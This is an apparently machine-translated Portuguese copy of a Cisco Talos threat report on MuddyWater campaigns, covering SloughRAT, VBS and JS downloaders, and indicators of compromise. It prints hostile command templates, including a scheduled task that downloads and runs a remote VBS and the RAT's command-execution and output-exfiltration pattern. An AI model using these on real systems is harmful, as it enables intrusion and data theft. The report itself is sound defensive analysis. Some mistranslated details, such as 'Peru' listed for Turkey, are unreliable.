blank

blank

  • A Cisco Talos observou novos ataques cibernéticos direcionados à Turquia e outros países asiáticos que acreditamos serem de grupos que operam sob o guarda-chuva MuddyWater de grupos APT. O Comando Cibernético dos EUA recentemente conectou a MuddyWater ao Ministério de Inteligência e Segurança do Irã (MOIS).
  • Essas campanhas utilizam principalmente documentos maliciosos (maldocs) para implantar downloaders e RATs implementados em várias linguagens, como PowerShell, Visual Basic e JavaScript.
  • Outra nova campanha direcionada à Península Arábica implanta um RAT baseado no FSM que estamos chamando de “SloughRAT”, identificado como um implante chamado “dossel” pelo CISA em seu comunicado divulgado no final de fevereiro.
  • Com base em uma revisão de várias campanhas da MuddyWater, avaliamos que o APT iraniano é um conglomerado de várias equipes operando de forma independente, em vez de um único grupo de atores de ameaças.
  • O supergrupo MuddyWater é altamente motivado e pode usar o acesso não autorizado para realizar espionagem, roubo de propriedade intelectual e implantar ransomware e malware destrutivo em uma empresa.

 

ADVERSÁRIO: MuddyWater
INDÚSTRIA: Governo
PAÍSES-ALVO: Jordânia, Irã (Republic Islâmica do Irã), Armênia, Peru, Paquistão
FAMÍLIAS DE MALWARE: MuddyWaterWSFSloughRAT
ATT&CK IDS: T1059 – Interpretador de comandos e scripts,T1134 – Manipulação do Token de Acesso,T1566 – Phishing,T1547 – Execução de inicialização automática de inicialização ou logon,T1102 – Serviço Web,T1047 – Instrumentação de gerenciamento do Windows,T1203 – Exploração para execução do cliente

 

SUMÁRIO EXECUTIVO

Cisco Talos identificou várias campanhas e ferramentas sendo perpetradas pelo grupo MuddyWater APT, amplamente considerado afiliado aos interesses iranianos. Esses agentes de ameaças são considerados extremamente motivados e persistentes quando se trata de atingir vítimas em todo o mundo.

A Talos divulgou uma campanha MuddyWater em janeiro visando entidades turcas que aproveitaram maldocs e cadeias de infecção baseadas em executáveis ​​para fornecer malware de download multiestágio baseado em PowerShell. Esse grupo usou anteriormente as mesmas táticas para atingir outros países da Ásia, como Armênia e Paquistão.

Em nossas últimas descobertas, descobrimos uma nova campanha visando a Turquia e a Península Arábica com maldocs para entregar um trojan de acesso remoto (RAT) baseado em arquivo de script do Windows (WSF) que estamos chamando de “SloughRAT”, um implante conhecido por “dossel” em Alerta mais recente da CISA de fevereiro de 2022 sobre MuddyWater.

Este trojan, embora ofuscado, é relativamente simples e tenta executar código arbitrário e comandos recebidos de seus servidores de comando e controle (C2).

Nossa investigação também levou à descoberta do uso de dois implantes adicionais baseados em script: um escrito em Visual Basic (VB) (final de 2021 – 2022) e outro em JavaScript (2019 – 2020), que também baixa e executa comandos arbitrários em sistema da vítima.

A variedade de iscas e cargas úteis do MuddyWater – juntamente com o direcionamento de várias regiões geográficas diferentes – fortalece nossa crescente hipótese de que o MuddyWater é um conglomerado de subgrupos em vez de um único ator. Esses subgrupos realizaram campanhas contra uma variedade de indústrias, como governos e ministérios nacionais e locaisuniversidades e entidades privadas, como provedores de telecomunicações. Embora essas equipes pareçam operar de forma independente, todas são motivadas pelos mesmos fatores que se alinham aos objetivos de segurança nacional iraniana, incluindo espionagem, roubo intelectual e operações destrutivas ou disruptivas com base nas vítimas que visam.

Uma variedade de campanhas analisadas são marcadas pelo desenvolvimento e uso de diferentes vetores de infecção e ferramentas para obter acesso, estabelecer acesso de longo prazo, extrair informações valiosas e monitorar seus alvos. As equipes da MuddyWater parecem compartilhar TTPs, como evidenciado pela adoção incremental de várias técnicas ao longo do tempo em diferentes campanhas da MuddyWater. Representamos essa progressão em um gráfico detalhado na primeira seção principal deste blog.

ATOR DE AMEAÇA MUDDYWATER

MuddyWater, também conhecido como “MERCURY” ou “Static Kitten”, é um grupo APT que o Comando Cibernético dos EUA recentemente atribuiu ao Ministério de Inteligência e Segurança do Irã ( MOIS ). Esse ator de ameaças, ativo desde pelo menos 2017, frequentemente realiza campanhas contra alvos de alto valor em países da América do Norte, Europa e Ásia. As campanhas MuddyWater normalmente se enquadram em uma das seguintes categorias:

  • Espionagem: coleta de informações sobre adversários ou parceiros regionais que podem beneficiar o Irã ajudando a promover seus interesses políticos, econômicos ou de segurança nacional.
  • Roubo de propriedade intelectual: Roubar propriedade intelectual e outras informações proprietárias pode beneficiar o Irã de várias maneiras, inclusive ajudando empresas iranianas contra seus concorrentes, influenciando decisões de política econômica em nível estadual ou informando esforços de pesquisa e design relacionados ao governo, entre outros. Essas campanhas visam entidades privadas e governamentais, como universidades, think tanks, agências federais e várias verticais da indústria.
  • Ataques de ransomware: MuddyWater já tentou implantar ransomware, como Thanos, nas redes das vítimas para destruir evidências de suas invasões ou interromper as operações.

A MuddyWater frequentemente depende do uso de DNS para contatar seus servidores C2, enquanto o contato inicial com os servidores de hospedagem é feito via HTTP. Suas cargas iniciais geralmente usam scripts do PowerShell, Visual Basic e JavaScript, juntamente com binários que vivem fora da terra ( LoLBins ) e utilitários de conexão remota para auxiliar nos estágios iniciais da infecção.

MUDDYWATER PROVAVELMENTE COMPOSTO POR VÁRIOS SUBGRUPOS

Avaliamos que o MuddyWater é um conglomerado de equipes menores, com cada equipe usando diferentes táticas de segmentação contra regiões específicas do mundo. Eles parecem compartilhar algumas técnicas e evoluí-las conforme necessário. Esse compartilhamento é possivelmente o resultado de contratados que mudam de equipe para equipe, ou o uso dos mesmos contratados de desenvolvimento e operacionais em cada equipe. O último também explica por que vimos indicadores simples, como strings e marcas d’água exclusivas compartilhadas entre os grupos APT MuddyWater e Phosphorus (também conhecidos como APT35 e Charming Kitten). Esses grupos são atribuídos a diferentes organizações estatais iranianas – MOIS e IRGC, respectivamente.

Com base em novas informações e uma revisão da atividade de ameaças e TTPs do MuddyWater, podemos vincular os ataques abordados em nosso blog MuddyWater de janeiro de 2022 com esta campanha mais recente direcionada à Turquia e outros países asiáticos. O gráfico abaixo mostra a sobreposição de TTPs e segmentação regional entre as várias campanhas MuddyWater, o que sugere que esses ataques são grupos de atividades distintos, mas relacionados. Embora algumas campanhas inicialmente parecessem alavancar novos TTPs que pareciam não estar relacionados a outras operações, descobrimos mais tarde que, em vez disso, elas demonstravam um paradigma mais amplo de compartilhamento de TTP, típico de equipes operacionais coordenadas.

blank

Ao rastrear a atividade da MuddyWater no ano passado, vemos que algumas das técnicas compartilhadas parecem ser refinadas de uma região para outra, sugerindo que as equipes usem seus sabores preferidos de ferramentas de escolha, incluindo cargas úteis finais. A linha do tempo acima também mostra o uso incremental de certas técnicas em diferentes campanhas ao longo do tempo, sugerindo que elas sejam testadas e aprimoradas antes de serem implementadas em operações futuras.

As duas primeiras técnicas que vemos sendo implementadas e compartilhadas em operações futuras são tokens de sinalização e um dropper executável. Observamos pela primeira vez o uso de tokens para sinalização em abril de 2021 em uma campanha contra o Paquistão por meio de um conta-gotas simples que baixa a ferramenta de administração remota “Connectwise”. Mais tarde, em junho, vemos o primeiro uso do dropper executável contra a Armênia (descrito em detalhes em nosso post anterior). A carga descartada é um script do PowerShell que carrega outro script do PowerShell que baixa e executa uma carga final baseada no PowerShell.

As duas técnicas foram combinadas no final de agosto de 2021 em uma campanha visando o Paquistão, desta vez ainda usando os tokens caseiros. Mais tarde, os atores passaram para uma implementação mais profissional do token usandoinfraestrutura do canarytokens[.]com . canarytokens[.]com é um serviço legítimo que o MuddyWater usa para tornar suas operações menos suspeitas. Essas técnicas foram aproveitadas em uma campanha de novembro de 2021 direcionada à Turquia na campanha que descrevemos em nosso blog de janeiro. Nesses ataques à Turquia, MuddyWater usou maldocs com tokens e os mesmos droppers executáveis ​​vistos anteriormente visando a Armênia e o Paquistão.

Em março de 2021, observamos o MuddyWater usando a ferramenta de tunelamento reverso Ligolo em ataques a países do Oriente Médio. Essa tática foi posteriormente reutilizada em dezembro de 2021, juntamente com a introdução de um novo implante. A partir de dezembro de 2021, observamos o MuddyWater usando um novo RAT baseado no FSM que chamamos de “SloughRAT” para segmentar países da Península Arábica, descrito em mais detalhes posteriormente neste blog. Durante nossa investigação, descobrimos outra versão do SloughRAT sendo implantada contra entidades na Jordânia. Esse ataque incluiu a implantação do Ligolo – uma tática da MuddyWater também corroborada pela Trend Micro em março de 2021 – após a implantação do SloughRAT.

Todos esses ataques mostram um padrão interessante: vários pontos em comum em alguns artefatos de infecção e TTPs importantes, mantendo distinções operacionais suficientes. Esse padrão pode ser dividido nas seguintes práticas:

  • A introdução de um TTP em uma geografia, um atraso tipicamente de dois ou três meses, depois a reutilização desse mesmo TTP em uma geografia completamente diferente, juntamente com outros TTPs comprovados emprestados de campanhas realizadas em outra geografia.
  • A introdução de pelo menos um novo TTP completamente novo para as táticas de MuddyWater em quase todas as campanhas geograficamente distintas.

Essas observações indicam fortemente que MuddyWater é um grupo de grupos, cada um responsável por direcionar uma geografia específica. Cada um também é responsável pelo desenvolvimento de novas técnicas de infecção, ao mesmo tempo em que pode tomar emprestado de um conjunto de TTPs testados em campanhas anteriormente separadas.

CAMPANHAS

Unindo campanhas anteriores da MuddyWater

Em nossa postagem anterior, divulgamos duas campanhas usando os mesmos tipos de executáveis ​​do Windows – uma direcionada à Turquia em novembro de 2021 e outra de junho de 2021 direcionada à Armênia. Outra campanha ilustrada anteriormente usou executáveis ​​semelhantes, desta vez para atingir o Paquistão. Esta campanha implantou um downloader baseado em PowerShell no endpoint para aceitar e executar comandos PS1 adicionais do servidor C2.

Voltando mais atrás, em abril de 2021, observamos outra instância de Muddywater visando entidades no Paquistão, desta vez com um vetor de infecção baseado em maldoc. O documento de atração alegava fazer parte de um processo judicial, como mostra a imagem abaixo.

blank

Isca maliciosa contendo uma imagem borrada do emblema do estado do Paquistão e referindo-se a um processo judicial.

Nesse caso, no entanto, os invasores tentaram implantar o cliente Connectwise Remote Access nos terminais do alvo, uma tática comumente usada pela MuddyWater para obter uma posição inicial nos terminais dos alvos.

Nos ataques que implantaram o RAT em abril de 2021 e o vetor de infecção baseado em EXE de agosto de 2021, os documentos maldocs e decoy entraram em contato com um servidor comum para baixar um arquivo de imagem comum que os vincula.

Essas campanhas usaram uma implementação caseira de tokens de sinalização. Nesse caso, os maldocs têm uma entidade externa baixada de um servidor controlador-atacante. Esta entidade consiste em uma imagem simples que não possui conteúdo malicioso. O mesmo URL base é usado em ambas as campanhas: hxxp://172.245.81[.]135:10196/Geq5P3aFpaSrK3PZtErNgUsVCfqQ9kZ9/

No entanto, o maldoc anexa a extensão de URL adicional

” ef4f0d9af47d737076923cfccfe01ba7/layer.jpg ” enquanto o chamariz anexa ” /Pan-op/gallery.jpg “.

Essa pode ser uma maneira de os invasores rastrearem seu vetor de infecção inicial e determinar qual deles é mais bem-sucedido. É altamente provável que os invasores tenham usado esse servidor como um rastreador de token para acompanhar infecções bem-sucedidas nesta campanha. Esse sistema de rastreamento de tokens foi migrado para CanaryTokens em setembro de 2021 nos ataques direcionados à Turquia usando os documentos maliciosos do Excel.

Campanha MuddyWater no Oriente Médio usando maldocs — SloughRAT

Durante um recente envolvimento de IR, a Talos observou várias instâncias de documentos maliciosos (maldocs) — especificamente arquivos XLS — distribuídos pela MuddyWater. Esses arquivos XLS foram observados visando a Península Arábica por meio de uma recente campanha de phishing.

O maldoc consiste em uma macro maliciosa que descarta dois arquivos WSF no endpoint. Um desses scripts é o script de instrumento destinado a executar o próximo estágio. Esse script de instrumento é colocado na pasta de inicialização do usuário atual pela macro VBA para estabelecer a persistência nas reinicializações.

O segundo script é um RAT baseado em WSF que chamamos de “SloughRAT” que pode executar comandos arbitrários no endpoint infectado. Este RAT consiste em código ofuscado de Visual Basic e JavaScript entrelaçados.

blank
Documento do Excel que descarta o arquivo Outlook.wsf.

SCRIPT DE INSTRUMENTO BASEADO NO WSF

À primeira vista, o script do instrumento parece complicado por causa de sua ofuscação. No entanto, em sua essência, o script destina-se exclusivamente a executar a próxima carga útil do WSF RAT.

Em tempo de execução, o código desofusca dois componentes principais para o próximo estágio:

  • Caminho para o script RAT que é codificado, mas ofuscado.
  • A chave de fato no RAT que aciona a chamada do código malicioso.

Esses dados são usados ​​para fazer uma chamada para o RAT baseado em WSF:

cmd.exe /c <path_to_WSF_RAT> <key>

blank
Desofuscação da persistência.

ANÁLISE SLOUGHRAT

O implante FSM tem várias capacidades. O script usa ofuscação multicamada para ocultar suas verdadeiras extensões. As capturas de tela abaixo são o resultado da análise e são desofuscações para melhor compreensão.

O script RAT precisa de um nome de função como argumento para ser executado corretamente e realizar suas atividades maliciosas. Esse nome é fornecido pelo script do instrumentor e pode ser um método para impedir a análise dinâmica automatizada, pois enviar o script RAT isoladamente sem o nome da função como argumento resultará em uma execução com falha da amostra em um sandbox.

COLETA DE INFORMAÇÕES PRELIMINARES E REGISTRO DE INFECÇÕES

O script RAT inicia a execução realizando uma consulta WMI para registrar o endereço IP do endpoint infectado.

blank
Desofuscação de recursos de descoberta.

Em seguida, ele obterá os nomes de usuário e computador consultando as variáveis ​​de ambiente:

  • %NOME DO COMPUTADOR%
  • %NOME DO USUÁRIO%
blank
Desofuscação de recursos de descoberta.

Essas informações do sistema são então concatenadas usando um delimitador e codificadas para registrar o sistema infectado com o servidor C2 codificado no implante.

Formato:

<IP_address>|!)!)!|%ComputerName%/%USERNAME%

RECURSOS DE RAT

Os recursos desse RAT são relativamente simples, além dos recursos de coleta de informações descritos anteriormente.

Assim que a infecção for registrada no servidor C2, o implante receberá um código de comando do servidor C2. O implante usa dois URLs diferentes:

  • Um é usado para registrar o implante e solicitar comandos arbitrários do C2.
  • Outro que é usado para POSTAR os resultados dos comandos executados no endpoint infectado.

A comunicação com o C2 é feita usando o ServerXMLHTTP comum da API MSXML2 para instrumentar uma solicitação HTTP POST.

O tempo entre cada solicitação é aleatório, o que torna o malware mais furtivo e pode contornar alguns sandboxes.

blank
Desofuscação da construção de solicitação HTTP.

Quaisquer dados enviados ao servidor C2 estão no formato de formulários HTTP acompanhados de cabeçalhos relevantes, como:

  • Tipo de conteúdo
  • Comprimento do conteúdo
  • Conjunto de caracteres.

Primeiro, o script envia as informações do sistema para a primeira URL C2, codificando a mensagem e enviando-a via POST request, dentro do parâmetro “vl” usando o seguinte formato:

<IP_address>|!)!)!|%ComputerName% /%USERNAME%

blank

Em seguida, o servidor retorna um UID construído por meio da concatenação do IP do servidor e um UUIDv4.

blank

Por exemplo, o UID 5-199-133-149-<UUIDv4> é armazenado em uma variável e envia mensagens keep-alive para solicitar comandos do C2.

Em seguida, este UID é enviado através dos parâmetros ” vl ” dentro de uma solicitação POST HTTP para outra URL C2.

blank

Quando o servidor recebe esse UID, ele retorna uma mensagem codificada que o script interpreta.

blank

A mensagem pode ser:

  • ” ok “: Não faça nada e envie o UID novamente (como um keep-alive).
  • ” 401 “: Esta ordem limpa a variável UID e força o script a solicitar outro UID, enviando uma solicitação ao primeiro URI.
  • Um comando a ser executado que inicia a rotina de execução do comando.

Um comando recebido do servidor C2 será executado usando o utilitário de linha de comando. Sua saída é gravada em um arquivo temporário no disco em um local como ” %TEMP%\stari.txt “. Esses dados são imediatamente lidos e enviados para o C2. A mensagem terá o seguinte formato:

<UID>|!)!)!|<result of command output>

Os comandos são executados usando a linha de comando:

cmd.exe /c <command_sent_by_C2> >> <path_to_temp_file>

blank
Desofuscação da rotina de execução de comandos.

Os atacantes usaram outra versão do SloughRAT, que não é tão ofuscada quanto a versão ilustrada anteriormente, desta vez visando entidades na Península Arábica. A funcionalidade geral usada nesta instância é a mesma com pequenas modificações em caminhos de arquivo, delimitadores, etc.

blank
Versão nº 2 do WSF RAT — apenas pequenas alterações.

Os invasores utilizaram o SloughRAT para implantar o Ligolo, uma ferramenta de encapsulamento reverso de código aberto para obter um maior grau de controle sobre os terminais infectados. Essa tática observada está em sincronia com as descobertas anteriores da Trend Micro.

Cadeia geral de infecção:

blank

Downloaders baseados em VBS

Em outra instância, observamos a implantação de downloaders maliciosos baseados em VBS em dezembro de 2021 e até janeiro de 2022 por meio de tarefas agendadas maliciosas configuradas pelos invasores. A tarefa agendada seria algo assim:

SchTasks /Create /SC ONCE /ST 00:01 /TN <task_name> /TR powershell -exec bypass -w 1 Invoke-WebRequest -Uri '<remote_URL_location>' -OutFile <malicious_VBS_path_on_endpoint>; 
wscript.exe <malicious_VBS_path_on_endpoint>

Essas tarefas baixam e analisam o conteúdo do servidor C2 e o executam no endpoint infectado. A saída do comando seria gravada em um arquivo temporário no diretório %APPDATA% e posteriormente lida e exfiltrada para o C2.

A cadeia de infecção completa desses downloaders baseados em VBS é atualmente desconhecida.

blank
Downloader baseado em VBS.

Campanha mais antiga usando downloaders baseados em JS

Uma campanha mais antiga operada pela MuddyWater no final de novembro de 2019 e em 2020 utilizou maldocs e uma cadeia complicada de scripts ofuscados para implantar um downloader/stager baseado em JavaScript no endpoint infectado. Esta campanha também parece segmentar usuários turcos.

O maldoc contém uma macro que descartaria um VBS ofuscado malicioso em um diretório no sistema. As macros então criariam persistência para o VBS por meio da chave Registry Run do usuário atual. Esse VBS é responsável por desofuscar as próximas cargas úteis e executá-las no endpoint. Essa execução culminou em um downloader JS malicioso sendo executado no sistema para baixar e executar comandos.

blank
Downloader baseado em JS.

CONCLUSÃO

A Cisco Talos observa há anos grupos de APT iranianos realizando operações e atividades maliciosas em todo o mundo. Particularmente, 2021 foi prolífico em incidentes de segurança cibernética para o Irã, onde as organizações estatais foram visadas. Esses eventos foram atribuídos às nações ocidentais pelo regime iraniano, com a promessa de vingança. É difícil dizer se essas campanhas são fruto de tais promessas ou apenas parte da atividade habitual desses grupos. No entanto, o fato de terem mudado alguns de seus métodos de operação e ferramentas é mais um sinal de sua adaptabilidade e falta de vontade de se abster de atacar outras nações.

Acreditamos que existem ligações entre essas diferentes campanhas, incluindo a migração de técnicas de região para região, juntamente com sua evolução para versões mais avançadas. No geral, as campanhas que descrevemos cobrem a Turquia, Paquistão, Armênia e países da Península Arábica. Embora compartilhem certas técnicas, essas campanhas também denotam individualidade na maneira como foram conduzidas, indicando a existência de várias subequipes sob o guarda-chuva de Muddywater – todas compartilhando um conjunto de táticas e ferramentas para escolher.

Estratégias de defesa aprofundadas baseadas em uma abordagem de análise de risco podem fornecer os melhores resultados na proteção contra um conjunto tão altamente motivado de agentes de ameaças. No entanto, isso deve sempre ser complementado por um bom plano de resposta a incidentes que não foi apenas testado com exercícios de mesa, mas também revisado e aprimorado toda vez que é testado em compromissos reais.

IOCS

Maldocs

4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c
026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141
7de663524b63b865e57ffc3eb4a339e150258583fdee6c2c2ca4dd7b5ed9dfe7
6e50e65114131d6529e8a799ff660be0fc5e88ec882a116f5a60a2279883e9c4
ef385ed64f795e106d17c0a53dfb398f774a555a9e287714d327bf3987364c1b

FSM

d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0
ed988768f50f1bb4cc7fb69f9633d6185714a99ecfd18b7b1b88a42a162b0418
c2badcdfa9b7ece00f245990bb85fb6645c05b155b77deaf2bb7a2a0aacbe49e
f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0
cc67e663f5f6cea8327e1323ecdb922ae8e48154bbf7bd3f9b2ee2374f61c5d6

VBS

fb69c821f14cb0d89d3df9eef2af2d87625f333535eb1552b0fcd1caba38281f

JS

202bf7a4317326b8d0b39f1fa19304c487128c8bd6e52893a6f06f9640e138e6
3fe9f94c09ee450ab24470a7bcd3d6194d8a375b3383f768662c1d561dab878d
cf9b1e0d17199f783ed2b863b0289e8f209600a37724a386b4482c2001146784

EXEs

a500e5ab8ce265d1dc8af1c00ea54a75b57ede933f64cea794f87ef1daf287a1

IP

185[.]118.164.195
5[.]199[.]133[.]149
88[.]119[.]170[.]124
185[.]183[.]97[.]25
95[.] 181.161.81
178[.]32[.]30[.]3

URLs

hxxp://185[.]118.164.195/c
hxxp://5[.]199[.]133[.]149/oeajgyxyxclqmfqayv
hxxp://5[.]199[.]133[.]149/ jznkmustntblvmdvgcwbvqb
hxxp: // 88 119.170.124 / lcekcnkxkbllmwlpoklgof [.]
hxxp: // 88 119.170.124 / ezedcjrfvjriftmldedu [.]
hxxp: // 178 32.30.3 [.]: 80 / kz10n2f9d5c4pkz10n2f9s2vhkz10n2f9 / gcvvPu2KXdqEbDpJQ33 /
hxxp: // 178 [.]32.30.3:80/kz10n2f9d5c4pkz10n2f9s2vhkz10n2f9/rrvvPu2KXdqEbDpJQ33/
hxxp://185[.]183.97.25/protocol/function.php
hxxp://lalindustries[.]com/wp-content/upgrade/editor.php
hxx ://advanceorthocenter[.]com/wp-includes/editor.php
hxxp://95[.]181.161.81/i100dfknzphd5k
hxxp://95[.]181.161.81/mm57aayn230
hxxp://95[.] 181.161.81:443/main.exe

 

Fonte: CISCO

ARTIGOS RELACIONADOSMais do autor